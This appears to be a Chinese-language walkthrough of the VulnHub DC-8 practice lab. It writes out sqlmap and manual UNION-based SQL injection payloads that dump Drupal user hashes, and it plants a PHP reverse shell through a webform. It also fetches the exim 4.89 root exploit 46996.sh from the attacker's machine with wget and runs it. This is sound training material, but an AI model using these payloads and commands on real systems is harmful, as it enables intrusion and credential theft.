DC系列(8)DC-8靶机渗透

0x00 前期准备

DC-8官网:https://www.vulnhub.com/entry/dc-8,367/
DC-8官wp:https://blog.mzfr.me/vulnhub-writeups/2019-09-5-DC8

  1. 官网提示:双重身份验证绕过,ssh相关。
    在这里插入图片描述

  2. 开启成功。
    在这里插入图片描述

0x01 sqlmap爆破/手动注入sql漏洞

  1. 常规扫描:nmap 172.20.10.0/24,找到DC8的ip地址为172.20.10.7,开放22、80端口。
    在这里插入图片描述

  2. 访问网页,CMS是Drupal7。
    在这里插入图片描述

  3. 依次点击detail中的栏目,看到url随之规律变化:?nid=1~3。
    在这里插入图片描述

  4. 猜测是数字型,试着sql注入3-2=1验证。存在sql漏洞。
    在这里插入图片描述

  5. 此处可以使用sqlmap工具爆破:sqlmap -u 172.20.10.7/?nid=2 --dbs --batch --risk 3 --level 5,爆破出mysql数据库中的两个库:

    使用参考:https://www.freebuf.com/sectool/164608.html

    在这里插入图片描述

  6. 针对d7db爆破:sqlmap -u 172.20.10.7/?nid=2 -D d7db --tables --batch --risk 3 --level 5,爆出user表。
    在这里插入图片描述

  7. 针对user表爆破:sqlmap -u 172.20.10.7/?nid=2 -D d7db -T users --risk 3 --level 5 --dump,可以看到有name和pass字段。
    在这里插入图片描述

  8. 针对这两个字段爆破:sqlmap -u 172.20.10.7/?nid=2 -D d7db -T users -C name,pass --dump,得到admin、john用户和加密的密码。
    在这里插入图片描述

  9. 或者,直接手动注入。因为是数字型注入,且有报错回显,开始借助hackbar爆库:http://172.20.10.7/?nid=1' --+
    在这里插入图片描述

  10. 爆出当前使用数据库名:http://172.20.10.7/?nid=-1 union select database() --+
    在这里插入图片描述

  11. 爆出数据库表名:http://172.20.10.7/?nid=-1 union select group_concat(table_name) from information_schema.tables where table_schema=database() --+,找到user表。
    在这里插入图片描述

  12. 爆列名:http://172.20.10.7/?nid=-1 union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+,找到pass和name列名。
    在这里插入图片描述

  13. 爆出这两列的内容,使用"-"连接:http://172.20.10.7/?nid=-1 union select group_concat(name,'-',pass) from users --+,得到同样的内容。
    在这里插入图片描述

0x02 John爆破登陆&login页面寻找

  1. 把用户名和密文写入dc8hash.txt。
    在这里插入图片描述

  2. 使用John破解:john dc8hash.txt,默认使用John自带词典。只爆破出了John的密码turtle。
    在这里插入图片描述

  3. 回到网页,表面没找到登陆界面,回到终端用dirb扫描网页目录(速度很慢),尝试直接访问http://172.20.10.7/robots.txt,找到了登陆界面/user/login。
    在这里插入图片描述

  4. 进入该网页路径,使用john-turtle登陆,成功。
    在这里插入图片描述

0x03 反弹shell

  1. 依次点击contact us→webform→form setting,在页面中切换Text format为php code。显然,这里可以写入php反弹shell代码(依然使用DC3中0x02提到的脚本)最上面写一段test语句,开放端口7788。
    在这里插入图片描述

  2. 拖到最下,保存contact us的配置,kali开启7788端口监听:nc -lvvp 7788,回到contact随意填写表单,其中邮件地址需要加@,否则提示地址错误无法提交。
    在这里插入图片描述

  3. 点击submit提交,kali中出现回显,反弹shell成功,进入交互式界面:python -c 'import pty;pty.spawn("/bin/bash")'
    在这里插入图片描述

0x04 exim提权

  1. 使用find命令查找具有suid权限的命令:find / -perm -u=s -type f 2>/dev/null。找到/usr/sbin/exim4,/sbin存放系统管理员以及其他需要root权限来运行的工具。

    sbin参考:https://cloud.tencent.com/developer/article/1009024
    在这里插入图片描述

  2. 查询exim版本号:exim4 –version,得到版本为4.89。
    在这里插入图片描述

  3. 在kali查询漏洞:searchsploit exim 4 -w
    在这里插入图片描述

  4. 访问,将网页内的bash脚本复制并写入本地46996.sh。在kali开启http服务:python2 -m SimpleHTTPServer 5566
    在这里插入图片描述

  5. 在dc8靶机下载文件:wget http://172.20.10.3:5566/46996.sh,注意此处一定要先切换到/tmp目录下,wget才拥有足够的权限写入文件。
    在这里插入图片描述

  6. 赋予脚本可执行权限:chmod +x 46996.sh。回顾46996.sh注释,提示在netcat模式下执行脚本如下:./46996.sh -m netcat
    在这里插入图片描述

  7. 按上一步执行脚本,提权成功。
    在这里插入图片描述

  8. 进入root目录,找到flag.txt,渗透结束。
    在这里插入图片描述

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值